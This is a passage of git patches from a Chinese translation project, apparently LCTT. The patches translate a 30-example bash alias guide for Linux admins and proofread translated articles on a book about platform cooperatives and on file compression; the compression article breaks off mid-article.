-### A note about os specific aliases
+### 定义与操作系统类型相关的别名
-You can add code as follows in ~/.bashrc [using the case statement][7]:
+可以将下面代码加入 `~/.bashrc` [使用 case 语句 ][7]:
```
### Get os name via uname ###
_myos="$(uname)"
@@ -116,13 +115,13 @@ case $_myos in
esac
```
-## 30 bash shell aliases examples
+## 30 个 bash shell 别名的案例
-You can define various types aliases as follows to save time and increase productivity.
+你可以定义各种类型的别名来节省时间并提高生产率。
-### #1: Control ls command output
+### #1:控制 ls 命令的输出
-The [ls command lists directory contents][8] and you can colorize the output:
+[ls 命令列出目录中的内容 ][8] 而你可以对输出进行着色:
```
## Colorize the ls output ##
alias ls = 'ls --color=auto'
@@ -134,7 +133,7 @@ alias ll = 'ls -la'
alias l.= 'ls -d . .. .git .gitignore .gitmodules .travis.yml --color=auto'
```
-### #2: Control cd command behavior
+### #2:控制 cd 命令的行为
```
## get rid of command not found ##
alias cd..= 'cd ..'
@@ -148,9 +147,9 @@ alias .4= 'cd ../../../../'
alias .5= 'cd ../../../../..'
```
-### #3: Control grep command output
+### #3:控制 grep 命令的输出
-[grep command is a command-line utility for searching][9] plain-text files for lines matching a regular expression:
+[grep 命令是一个用于在纯文本文件中搜索匹配正则表达式的行的命令行工具 ][9]:
```
## Colorize the grep command output for ease of use (good for log files)##
alias grep = 'grep --color=auto'
@@ -158,44 +157,44 @@ alias egrep = 'egrep --color=auto'
alias fgrep = 'fgrep --color=auto'
```
-### #4: Start calculator with math support
+### #4:让计算器默认开启 math 库
```
alias bc = 'bc -l'
```
-### #4: Generate sha1 digest
+### #4:生成 sha1 数字签名
```
alias sha1 = 'openssl sha1'
```
-### #5: Create parent directories on demand
+### #5:自动创建父目录
-[mkdir command][10] is used to create a directory:
+[mkdir 命令 ][10] 用于创建目录:
```
alias mkdir = 'mkdir -pv'
```
-### #6: Colorize diff output
+### #6:为 diff 输出着色
-You can [compare files line by line using diff][11] and use a tool called colordiff to colorize diff output:
+你可以[使用 diff 来一行行第比较文件 ][11] 而一个名为 colordiff 的工具可以为 diff 输出着色:
```
# install colordiff package :)
alias diff = 'colordiff'
```
-### #7: Make mount command output pretty and human readable format
+### #7:让 mount 命令的输出更漂亮,更方便人类阅读
```
alias mount = 'mount |column -t'
```
-### #8: Command short cuts to save time
+### #8:简化命令以节省时间
```
# handy short cuts #
alias h = 'history'
alias j = 'jobs -l'
```
-### #9: Create a new set of commands
+### #9:创建一系列新命令
```
alias path = 'echo -e ${PATH//:/\\n}'
alias now = 'date +"%T"'
@@ -203,7 +202,7 @@ alias nowtime =now
alias nowdate = 'date +"%d-%m-%Y"'
```
-### #10: Set vim as default
+### #10:设置 vim 为默认编辑器
```
alias vi = vim
alias svi = 'sudo vi'
@@ -211,7 +210,7 @@ alias vis = 'vim "+set si"'
alias edit = 'vim'
```
-### #11: Control output of networking tool called ping
+### #11:控制网络工具 ping 的输出
```
# Stop after sending count ECHO_REQUEST packets #
alias ping = 'ping -c 5'
@@ -220,16 +219,16 @@ alias ping = 'ping -c 5'
alias fastping = 'ping -c 100 -s.2'
```
-### #12: Show open ports
+### #12:显示打开的端口
-Use [netstat command][12] to quickly list all TCP/UDP port on the server:
+使用 [netstat 命令 ][12] 可以快速列出服务区中所有的 TCP/UDP 端口:
```
alias ports = 'netstat -tulanp'
```
-### #13: Wakeup sleeping servers
+### #13:唤醒休眠额服务器
-[Wake-on-LAN (WOL) is an Ethernet networking][13] standard that allows a server to be turned on by a network message. You can [quickly wakeup nas devices][14] and server using the following aliases:
+[Wake-on-LAN (WOL) 是一个以太网标准 ][13],可以通过网络消息来开启服务器。你可以使用下面别名来[快速激活 nas 设备 ][14] 以及服务器:
```
## replace mac with your actual server mac address #
alias wakeupnas01 = '/usr/bin/wakeonlan 00:11:32:11:15:FC'
@@ -237,9 +236,9 @@ alias wakeupnas02 = '/usr/bin/wakeonlan 00:11:32:11:15:FD'
alias wakeupnas03 = '/usr/bin/wakeonlan 00:11:32:11:15:FE'
```
-### #14: Control firewall (iptables) output
+### #14:控制防火墙 (iptables) 的输出
-[Netfilter is a host-based firewall][15] for Linux operating systems. It is included as part of the Linux distribution and it is activated by default. This [post list most common iptables solutions][16] required by a new Linux user to secure his or her Linux operating system from intruders.
+[Netfilter 是一款 Linux 操作系统上的主机防火墙 ][15]。它是 Linux 发行版中的一部分,且默认情况下是激活状态。[这里列出了大多数 Liux 新手防护入侵者最常用的 iptables 方法 ][16]。
```
## shortcut for iptables and pass it via sudo#
alias ipt = 'sudo /sbin/iptables'
@@ -252,7 +251,7 @@ alias iptlistfw = 'sudo /sbin/iptables -L FORWARD -n -v --line-numbers'
alias firewall =iptlist
```
-### #15: Debug web server / cdn problems with curl
+### #15:使用 curl 调试 web 服务器 /cdn 上的问题
```
# get web server headers #
alias header = 'curl -I'
@@ -261,7 +260,7 @@ alias header = 'curl -I'
alias headerc = 'curl -I --compress'
```
-### #16: Add safety nets
+### #16:增加安全性
```
# do not delete / or prompt if deleting more than 3 files at a time #
alias rm = 'rm -I --preserve-root'
@@ -277,9 +276,9 @@ alias chmod = 'chmod --preserve-root'
alias chgrp = 'chgrp --preserve-root'
```
-### #17: Update Debian Linux server
+### #17:更新 Debian Linux 服务器
-[apt-get command][17] is used for installing packages over the internet (ftp or http). You can also upgrade all packages in a single operations:
+[apt-get 命令 ][17] 用于通过因特网安装软件包 (ftp 或 http)。你也可以一次性升级所有软件包:
```
# distro specific - Debian / Ubuntu and friends #
# install with apt-get
@@ -290,25 +289,25 @@ alias updatey = "sudo apt-get --yes"
alias update = 'sudo apt-get update && sudo apt-get upgrade'
```
-### #18: Update RHEL / CentOS / Fedora Linux server
+### #18:更新 RHEL / CentOS / Fedora Linux 服务器
-[yum command][18] is a package management tool for RHEL / CentOS / Fedora Linux and friends:
+[yum 命令 ][18] 是 RHEL / CentOS / Fedora Linux 以及其他基于这些发行版的 Linux 上的软件包管理工具:
```
## distrp specifc RHEL/CentOS ##
alias update = 'yum update'
alias updatey = 'yum -y update'
```
-### #19: Tune sudo and su
+### #19:优化 sudo 和 su 命令
```
# become root #
alias root = 'sudo -i'
alias su = 'sudo -i'
```
-### #20: Pass halt/reboot via sudo
+### #20:使用 sudo 执行 halt/reboot 命令
-[shutdown command][19] bring the Linux / Unix system down:
+[shutdown 命令 ][19] 会让 Linux / Unix 系统关机:
```
# reboot / halt / poweroff
alias reboot = 'sudo /sbin/reboot'
@@ -317,7 +316,7 @@ alias halt = 'sudo /sbin/halt'
alias shutdown = 'sudo /sbin/shutdown'
```
-### #21: Control web servers
+### #21:控制 web 服务器
```
# also pass it via sudo so whoever is admin can reload it without calling you #
alias nginxreload = 'sudo /usr/local/nginx/sbin/nginx -s reload'
@@ -328,7 +327,7 @@ alias httpdreload = 'sudo /usr/sbin/apachectl -k graceful'
alias httpdtest = 'sudo /usr/sbin/apachectl -t && /usr/sbin/apachectl -t -D DUMP_VHOSTS'
```
-### #22: Alias into our backup stuff
+### #22:与备份相关的别名
```
# if cron fails or if you want backup on demand just run these commands #
# again pass it via sudo so whoever is in admin group can start the job #
@@ -343,7 +342,7 @@ alias rsnapshotmonthly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnaps
alias amazonbackup =s3backup
```
-### #23: Desktop specific - play avi/mp3 files on demand
+### #23:桌面应用相关的别名 - 按需播放的 avi/mp3 文件
```
## play video files in a current directory ##
# cd ~/Download/movie-name
@@ -366,9 +365,9 @@ alias music = 'mplayer --shuffle *'
```
-### #24: Set default interfaces for sys admin related commands
+### #24:设置系统管理相关命令的默认网卡
-[vnstat is console-based network][20] traffic monitor. [dnstop is console tool][21] to analyze DNS traffic. [tcptrack and iftop commands displays][22] information about TCP/UDP connections it sees on a network interface and display bandwidth usage on an interface by host respectively.
+[vnstat 一款基于终端的网络流量检测器 ][20]。[dnstop 是一款分析 DNS 流量的终端工具 ][21]。[tcptrack 和 iftop 命令显示 ][22] TCP/UDP 连接方面的信息,它监控网卡并显示其消耗的带宽。
```
## All of our servers eth1 is connected to the Internets via vlan / router etc ##
alias dnstop = 'dnstop -l 5 eth1'
@@ -382,7 +381,7 @@ alias ethtool = 'ethtool eth1'
alias iwconfig = 'iwconfig wlan0'
```
-### #25: Get system memory, cpu usage, and gpu memory info quickly
+### #25:快速获取系统内存,cpu 使用,和 gpu 内存相关信息
```
## pass options to free ##
alias meminfo = 'free -m -l -t'
@@ -405,9 +404,9 @@ alias cpuinfo = 'lscpu'
alias gpumeminfo = 'grep -i --color memory /var/log/Xorg.0.log'
```
-### #26: Control Home Router
+### #26:控制家用路由器
-The curl command can be used to [reboot Linksys routers][23].
+curl 命令可以用来 [重启 Linksys 路由器 ][23]。
```
# Reboot my home Linksys WAG160N / WAG54 / WAG320 / WAG120N Router / Gateway from *nix.
alias rebootlinksys = "curl -u 'admin:my-super-password' 'http://192.168.1.2/setup.cgi?todo=reboot'"
@@ -416,15 +415,15 @@ alias rebootlinksys = "curl -u 'admin:my-super-password' 'http://192.168.1.2/set
alias reboottomato = "ssh admin@192.168.1.1 /sbin/reboot"
```
-### #27 Resume wget by default
+### #27 wget 默认断点续传
-The [GNU Wget is a free utility for non-interactive download][25] of files from the Web. It supports HTTP, HTTPS, and FTP protocols, and it can resume downloads too:
+[GNU Wget 是一款用来从 web 下载文件的自由软件 ][25]。它支持 HTTP,HTTPS,以及 FTP 协议,而且它页支持断点续传:
```
## this one saved by butt so many times ##
alias wget = 'wget -c'
```
-### #28 Use different browser for testing website
+### #28 使用不同浏览器来测试网站
```
## this one saved by butt so many times ##
alias ff4 = '/opt/firefox4/firefox'
@@ -439,9 +438,9 @@ alias ff =ff13
alias browser =chrome
```
-### #29: A note about ssh alias
+### #29:关于 ssh 别名的注意事项
-Do not create ssh alias, instead use ~/.ssh/config OpenSSH SSH client configuration files. It offers more option. An example:
+不要创建 ssh 别名,代之以 `~/.ssh/config` 这个 OpenSSH SSH 客户端配置文件。它的选项更加丰富。下面是一个例子:
```
Host server10
Hostname 1.2.3.4
@@ -452,12 +451,12 @@ Host server10
TCPKeepAlive yes
```
-Host server10 Hostname 1.2.3.4 IdentityFile ~/backups/.ssh/id_dsa user foobar Port 30000 ForwardX11Trusted yes TCPKeepAlive yes
+然后你就可以使用下面语句连接 peer1 了:
+```
+$ ssh server10
+```
-You can now connect to peer1 using the following syntax:
-`$ ssh server10`
-
-### #30: It's your turn to share…
+### #30:现在该分享你的别名了
```
## set some other defaults ##
@@ -487,20 +486,18 @@ alias cdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile akamai --stdi
alias amzcdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile amazon --stdin'
```
-## Conclusion
+## 结论
-This post summarizes several types of uses for *nix bash aliases:
+本文总结了 *nix bash 别名的多种用法:
- 1. Setting default options for a command (e.g. set eth0 as default option for ethtool command via alias ethtool='ethtool eth0' ).
- 2. Correcting typos (cd.. will act as cd .. via alias cd..='cd ..').
- 3. Reducing the amount of typing.
- 4. Setting the default path of a command that exists in several versions on a system (e.g. GNU/grep is located at /usr/local/bin/grep and Unix grep is located at /bin/grep. To use GNU grep use alias grep='/usr/local/bin/grep' ).
- 5. Adding the safety nets to Unix by making commands interactive by setting default options. (e.g. rm, mv, and other commands).
- 6. Compatibility by creating commands for older operating systems such as MS-DOS or other Unix like operating systems (e.g. alias del=rm ).
+ 1。为命令设置默认的参数(例如通过 `alias ethtool='ethtool eth0'` 设置 ethtool 命令的默认参数为 eth0)。
+ 2。修正错误的拼写(通过 `alias cd。.='cd .。'`让 `cd。.` 变成 `cd .。`)。
+ 3。缩减输入。
+ 4。设置系统中多版本命令的默认路径(例如 GNU/grep 位于 /usr/local/bin/grep 中而 Unix grep 位于 /bin/grep 中。若想默认使用 GNU grep 则设置别名 `grep='/usr/local/bin/grep'` )。
+ 5。通过默认开启命令(例如 rm,mv 等其他命令)的交互参数来增加 Unix 的安全性。
+ 6。为老旧的操作系统(比如 MS-DOS 或者其他类似 Unix 的操作系统)创建命令以增加兼容性(比如 `alias del=rm` )。
-
-
-I've shared my aliases that I used over the years to reduce the need for repetitive command line typing. If you know and use any other bash/ksh/csh aliases that can reduce typing, share below in the comments.
+我已经分享了多年来为了减少重复输入命令而使用的别名。若你知道或使用的哪些 bash/ksh/csh 别名能够减少输入,请在留言框中分享。
--------------------------------------------------------------------------------
@@ -516,26 +513,26 @@ via: https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html
[a]:https://www.cyberciti.biz
[1]:https://bash.cyberciti.biz/guide/~/.bashrc
[2]:https://www.cyberciti.biz/tips/wp-content/uploads/2012/06/Getting-Started-With-Bash-Shell-Aliases-For-Linux-Unix.jpg
-[3]://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html (See Linux/Unix alias command examples for more info)
+[3]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html (See Linux/Unix alias command examples for more info)
[4]:https://bash.cyberciti.biz/guide/Create_and_use_aliases
-[5]://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
+[5]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
[6]:https://bash.cyberciti.biz/guide/Create_and_use_aliases#How_do_I_remove_the_alias.3F
[7]:https://bash.cyberciti.biz/guide/The_case_statement
-[8]://www.cyberciti.biz/faq/ls-command-to-examining-the-filesystem/
-[9]://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/
-[10]://www.cyberciti.biz/faq/linux-make-directory-command/
-[11]://www.cyberciti.biz/faq/how-do-i-compare-two-files-under-linux-or-unix/
-[12]://www.cyberciti.biz/faq/how-do-i-find-out-what-ports-are-listeningopen-on-my-linuxfreebsd-server/
-[13]://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
+[8]:https://www.cyberciti.biz/faq/ls-command-to-examining-the-filesystem/
+[9]:https://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/
+[10]:https://www.cyberciti.biz/faq/linux-make-directory-command/
+[11]:https://www.cyberciti.biz/faq/how-do-i-compare-two-files-under-linux-or-unix/
+[12]:https://www.cyberciti.biz/faq/how-do-i-find-out-what-ports-are-listeningopen-on-my-linuxfreebsd-server/
+[13]:https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
[14]:https://bash.cyberciti.biz/misc-shell/simple-shell-script-to-wake-up-nas-devices-computers/
-[15]://www.cyberciti.biz/faq/rhel-fedorta-linux-iptables-firewall-configuration-tutorial/ (iptables CentOS/RHEL/Fedora tutorial)
-[16]://www.cyberciti.biz/tips/linux-iptables-examples.html
-[17]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html
-[18]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/
-[19]://www.cyberciti.biz/faq/howto-shutdown-linux/
-[20]://www.cyberciti.biz/tips/keeping-a-log-of-daily-network-traffic-for-adsl-or-dedicated-remote-linux-box.html
-[21]://www.cyberciti.biz/faq/dnstop-monitor-bind-dns-server-dns-network-traffic-from-a-shell-prompt/
-[22]://www.cyberciti.biz/faq/check-network-connection-linux/
-[23]://www.cyberciti.biz/faq/reboot-linksys-wag160n-wag54-wag320-wag120n-router-gateway/
-[24]:/cdn-cgi/l/email-protection
-[25]://www.cyberciti.biz/tips/wget-resume-broken-download.html
+[15]:https://www.cyberciti.biz/faq/rhel-fedorta-linux-iptables-firewall-configuration-tutorial/ (iptables CentOS/RHEL/Fedora tutorial)
+[16]:https://www.cyberciti.biz/tips/linux-iptables-examples.html
+[17]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html
+[18]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/
+[19]:https://www.cyberciti.biz/faq/howto-shutdown-linux/
+[20]:https://www.cyberciti.biz/tips/keeping-a-log-of-daily-network-traffic-for-adsl-or-dedicated-remote-linux-box.html
+[21]:https://www.cyberciti.biz/faq/dnstop-monitor-bind-dns-server-dns-network-traffic-from-a-shell-prompt/
+[22]:https://www.cyberciti.biz/faq/check-network-connection-linux/
+[23]:https://www.cyberciti.biz/faq/reboot-linksys-wag160n-wag54-wag320-wag120n-router-gateway/
+[24]:https:/cdn-cgi/l/email-protection
+[25]:https://www.cyberciti.biz/tips/wget-resume-broken-download.html
From 4c7c594d470ac79df12bbf208bd1cc5a83cdafa0 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 23:05:24 +0800
Subject: [PATCH 182/371] PRF:20170131 Book review Ours to Hack and to Own.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@darsh8 恭喜你完成了第一篇翻译贡献(很抱歉,没及时看到你的贡献,所以校对发布有点晚了)。
---
...131 Book review Ours to Hack and to Own.md | 37 ++++++++++---------
1 file changed, 19 insertions(+), 18 deletions(-)
diff --git a/translated/talk/20170131 Book review Ours to Hack and to Own.md b/translated/talk/20170131 Book review Ours to Hack and to Own.md
index 1948ea4ab9..32e5f75a66 100644
--- a/translated/talk/20170131 Book review Ours to Hack and to Own.md
+++ b/translated/talk/20170131 Book review Ours to Hack and to Own.md
@@ -1,48 +1,49 @@
书评:《Ours to Hack and to Own》
============================================================
- ![书评: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/EDUCATION_colorbooks.png?itok=liB3FyjP "Book review: Ours to Hack and to Own")
+ ![书评: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "Book review: Ours to Hack and to Own")
+
Image by : opensource.com
-私有制的时代看起来似乎结束了,我将不仅仅讨论那些由我们中的许多人引入到我们的家庭与生活的设备和软件。我也将讨论这些设备与应用依赖的平台与服务。
+私有制的时代看起来似乎结束了,在这里我将不仅仅讨论那些由我们中的许多人引入到我们的家庭与生活的设备和软件,我也将讨论这些设备与应用依赖的平台与服务。
-尽管我们使用的许多服务是免费的,我们对它们并没有任何控制。本质上讲,这些企业确实控制着我们所看到的,听到的以及阅读到的内容。不仅如此,许多企业还在改变工作的性质。他们正使用封闭的平台来助长由全职工作到[零工经济][2]的转变方式,这种方式提供极少的安全性与确定性。
+尽管我们使用的许多服务是免费的,但我们对它们并没有任何控制权。本质上讲,这些企业确实控制着我们所看到的、听到的以及阅读到的内容。不仅如此,许多企业还在改变工作的本质。他们正使用封闭的平台来助长由全职工作到[零工经济][2]的转变,这种方式提供极少的安全性与确定性。
-这项行动对于网络以及每一个使用与依赖网络的人产生了广泛的影响。仅仅二十多年前的开放网络的想象正在逐渐消逝并迅速地被一块难以穿透的幕帘所取代。
+这项行动对于网络以及每一个使用与依赖网络的人产生了广泛的影响。仅仅二十多年前的对开放互联网的想象正在逐渐消逝,并迅速地被一块难以穿透的幕帘所取代。
-一种变得流行的补救办法就是建立[平台合作][3], 由他们的用户所拥有的电子化平台。正如这本书所阐述的,平台合作社背后的观点与开源有许多相同的根源。
+一种逐渐流行的补救办法就是建立[平台合作社][3], 即由他们的用户所拥有的电子化平台。正如这本书[《Ours to Hack and to Own》][4]所阐述的,平台合作社背后的观点与开源有许多相同的根源。
-学者Trebor Scholz和作家Nathan Schneider已经收集了40篇探讨平台合作社作为普通人可使用以提升开放性并对闭源系统的不透明性及各种限制予以还击的工具的增长及需求的论文。
+学者 Trebor Scholz 和作家 Nathan Schneider 已经收集了 40 篇论文,探讨平台合作社作为普通人可使用的工具的增长及需求,以提升开放性并对闭源系统的不透明性及各种限制予以还击。
-### 哪里适合开源
+### 何处适合开源
-任何平台合作社核心及接近核心的部分依赖与开源;不仅开源技术是必要的,构成开源开放性,透明性,协同合作以及共享的准则与理念同样不可或缺。
+任何平台合作社核心及接近核心的部分依赖于开源;不仅开源技术是必要的,构成开源开放性、透明性、协同合作以及共享的准则与理念同样不可或缺。
-在这本书的介绍中, Trebor Scholz指出:
+在这本书的介绍中,Trebor Scholz 指出:
-> 与网络的黑盒子系统相反,这些平台需要使它们的数据流透明来辨别自身。他们需要展示客户与员工的数据在哪里存储,数据出售给了谁以及数据为了何种目的。
+> 与斯诺登时代的互联网黑盒子系统相反,这些平台需要使它们的数据流透明来辨别自身。他们需要展示客户与员工的数据在哪里存储,数据出售给了谁以及数据用于何种目的。
-正是对开源如此重要的透明性,促使平台合作社如此吸引人并在目前大量已存平台之中成为令人耳目一新的变化。
+正是对开源如此重要的透明性,促使平台合作社如此吸引人,并在目前大量已有平台之中成为令人耳目一新的变化。
-开源软件在《Ours to Hack and to Own》所分享的平台合作社的构想中必然充当着重要角色。开源软件能够为群体建立助推合作社的技术型公共建设提供快速,不算昂贵的途径。
+开源软件在《Ours to Hack and to Own》所分享的平台合作社的构想中必然充当着重要角色。开源软件能够为群体建立助推合作社的技术基础设施提供快速而不算昂贵的途径。
-Mickey Metts在论文中这样形容, "与你的友好的社区型技术合作社相遇。(原文:Meet Your Friendly Neighborhood Tech Co-Op.)" Metts为一家名为Agaric的企业工作,这家企业使用Drupal为团体及小型企业建立他们不能独自完成的产品。除此以外, Metts还鼓励任何想要建立并运营自己的企业的公司或合作社的人接受免费且开源的软件。为什么呢?因为它是高质量的,不算昂贵的,可定制的,并且你能够与由乐于助人而又热情的人们组成的大型社区产生联系。
+Mickey Metts 在论文中这样形容, “邂逅你的友邻技术伙伴。" Metts 为一家名为 Agaric 的企业工作,这家企业使用 Drupal 为团体及小型企业建立他们不能自行完成的平台。除此以外, Metts 还鼓励任何想要建立并运营自己的企业的公司或合作社的人接受自由开源软件。为什么呢?因为它是高质量的、并不昂贵的、可定制的,并且你能够与由乐于助人而又热情的人们组成的大型社区产生联系。
### 不总是开源的,但开源总在
-这本书里不是所有的论文都聚焦或提及开源的;但是,开源方式的关键元素-合作,社区,开放管理以及电子自由化-总是在其表面若隐若现。
+这本书里不是所有的论文都关注或提及开源的;但是,开源方式的关键元素——合作、社区、开放治理以及电子自由化——总是在其间若隐若现。
-事实上正如《Ours to Hack and to Own》中许多论文所讨论的,建立一个更加开放,基于平常人的经济与社会区块,平台合作社会变得非常重要。用Douglas Rushkoff的话讲,那会是类似Creative Commons的组织“对共享知识资源的私有化”的补偿。它们也如Barcelona的CTO(首席执行官)Francesca Bria所描述的那样,是“通过确保市民数据安全性,隐私性和权利的系统”来运营他们自己的“分布式通用数据基础架构”的城市。
+事实上正如《Ours to Hack and to Own》中许多论文所讨论的,建立一个更加开放、基于平常人的经济与社会区块,平台合作社会变得非常重要。用 Douglas Rushkoff 的话讲,那会是类似 Creative Commons 的组织“对共享知识资源的私有化”的补偿。它们也如 Barcelona 的 CTO Francesca Bria 所描述的那样,是“通过确保市民数据安全性、隐私性和权利的系统”来运营他们自己的“分布式通用数据基础架构”的城市。
### 最后的思考
-如果你在寻找改变互联网的蓝图以及我们工作的方式,《Ours to Hack and to Own》并不是你要寻找的。这本书与其说是用户指南,不如说是一种宣言。如书中所说,《Ours to Hack and to Own》让我们略微了解如果我们将开源方式准则应用于社会及更加广泛的世界我们能够做的事。
+如果你在寻找改变互联网以及我们工作的方式的蓝图,《Ours to Hack and to Own》并不是你要寻找的。这本书与其说是用户指南,不如说是一种宣言。如书中所说,《Ours to Hack and to Own》让我们略微了解如果我们将开源方式准则应用于社会及更加广泛的世界我们能够做的事。
--------------------------------------------------------------------------------
作者简介:
-Scott Nesbitt -作家,编辑,雇佣兵,虎猫牛仔(原文:Ocelot wrangle),丈夫与父亲,博客写手,陶器收藏家。Scott正是做这样的一些事情。他还是大量写关于开源软件文章与博客的长期开源用户。你可以在Twitter,Github上找到他。
+Scott Nesbitt ——作家、编辑、雇佣兵、 虎猫牛仔、丈夫与父亲、博客写手、陶器收藏家。Scott 正是做这样的一些事情。他还是大量写关于开源软件文章与博客的长期开源用户。你可以在 Twitter、Github 上找到他。
--------------------------------------------------------------------------------
@@ -50,7 +51,7 @@ via: https://opensource.com/article/17/1/review-book-ours-to-hack-and-own
作者:[Scott Nesbitt][a]
译者:[darsh8](https://github.com/darsh8)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 33d045f17df06e68833800d253799e28a49dd56d Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 23:06:25 +0800
Subject: [PATCH 183/371] PUB:20170131 Book review Ours to Hack and to Own.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@darsh8 文章首发地址: https://linux.cn/article-9220-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/darsh8
加油!
---
.../20170131 Book review Ours to Hack and to Own.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/talk => published}/20170131 Book review Ours to Hack and to Own.md (100%)
diff --git a/translated/talk/20170131 Book review Ours to Hack and to Own.md b/published/20170131 Book review Ours to Hack and to Own.md
similarity index 100%
rename from translated/talk/20170131 Book review Ours to Hack and to Own.md
rename to published/20170131 Book review Ours to Hack and to Own.md
From 03f86d8148b6c0c0eda07cc7ede2359fe58f38e4 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 00:17:46 +0800
Subject: [PATCH 184/371] PRF:20171214 How to squeeze the most out of Linux
file compression.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@singledo 恭喜你,完成了第一篇翻译贡献(抱歉没及时看到,校对发布晚了)。请根据我的校对,了解你需要注意的格式方面的调整。
---
...all and use encryptpad on ubuntu 16.04.md} | 0
... the most out of Linux file compression.md | 92 ++++++++++++-------
2 files changed, 60 insertions(+), 32 deletions(-)
rename translated/tech/{How to install and use encryptpad on ubuntu 16.04.md => 20171214 How to install and use encryptpad on ubuntu 16.04.md} (100%)
diff --git a/translated/tech/How to install and use encryptpad on ubuntu 16.04.md b/translated/tech/20171214 How to install and use encryptpad on ubuntu 16.04.md
similarity index 100%
rename from translated/tech/How to install and use encryptpad on ubuntu 16.04.md
rename to translated/tech/20171214 How to install and use encryptpad on ubuntu 16.04.md
diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md
index f844719399..92a51322c2 100644
--- a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md
+++ b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md
@@ -1,7 +1,13 @@
-如何优雅的使用大部分的 Linux 文件压缩
+如何在 Linux 使用文件压缩
=======
- 如果你对 linux 系统下的对文件压缩命令或操作的有效性有任何疑问 ,你应该看一下 **apropos compress** 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此多的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。
- 你想在所有词目中寻找一组 bzip2 的压缩命令 。包括 zip ,gzip ,和 xz 在内 ,你将得到一个有意思的操作。
+
+![](https://images.idgesg.net/images/article/2017/12/snake-bus-100743983-large.jpg)
+
+> Linux 系统为文件压缩提供了许多选择,关键是选择一个最适合你的。
+
+如果你对可用于 Linux 系统的文件压缩命令或选项有任何疑问,你也许应该看一下 `apropos compress` 这个命令的输出。如果你有机会这么做,你会惊异于有如此多的的命令来进行压缩文件和解压缩文件;此外还有许多命令来进行压缩文件的比较、检验,并且能够在压缩文件中的内容中进行搜索,甚至能够把压缩文件从一个格式变成另外一种格式(如,将 `.z` 格式变为 `.gz` 格式 )。
+
+你可以看到只是适用于 bzip2 压缩的全部条目就有这么多。加上 zip、gzip 和 xz 在内,你会有非常多的选择。
```
$ apropos compress | grep ^bz
@@ -17,16 +23,19 @@ $ apropos compress | grep ^bz
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
```
- 在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。
+在我的 Ubuntu 系统上 ,`apropos compress` 命令的返回中列出了 60 条以上的命令。
-## 压缩算法
- 压缩并没有普适的方案 ,某些压缩工具是有损耗的压缩 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是 Linux 命令行能够用算法使压缩文件或档案文件能够重新恢复为原始数据 ,换句话说 ,算法能够使压缩或存档无损 。
+### 压缩算法
- 这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期 ,压缩是第一个被介绍的 。
+压缩并没有普适的方案,某些压缩工具是有损压缩,例如一些压缩用于减少 mp3 文件大小,而能够使聆听者有接近原声的音乐感受。但是在 Linux 命令行上压缩或归档用户文件所使用的算法必须能够精确地重新恢复为原始数据。换句话说,它们必须是无损的。
-## 在 Linux 系统上的压缩命令
- 在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。
- 一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件会比原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。
+这是如何做到的?让我们假设在一行上有 300 个相同的字符可以被压缩成像 “300x” 这样的字符串,但是这种算法对大多数文件没有很大的用处,因为文件中不可能包含长的相同字符序列比完全随机的序列更多。 压缩算法要复杂得多,从 Unix 早期压缩首次被引入以来,它就越来越复杂了。
+
+### 在 Linux 系统上的压缩命令
+
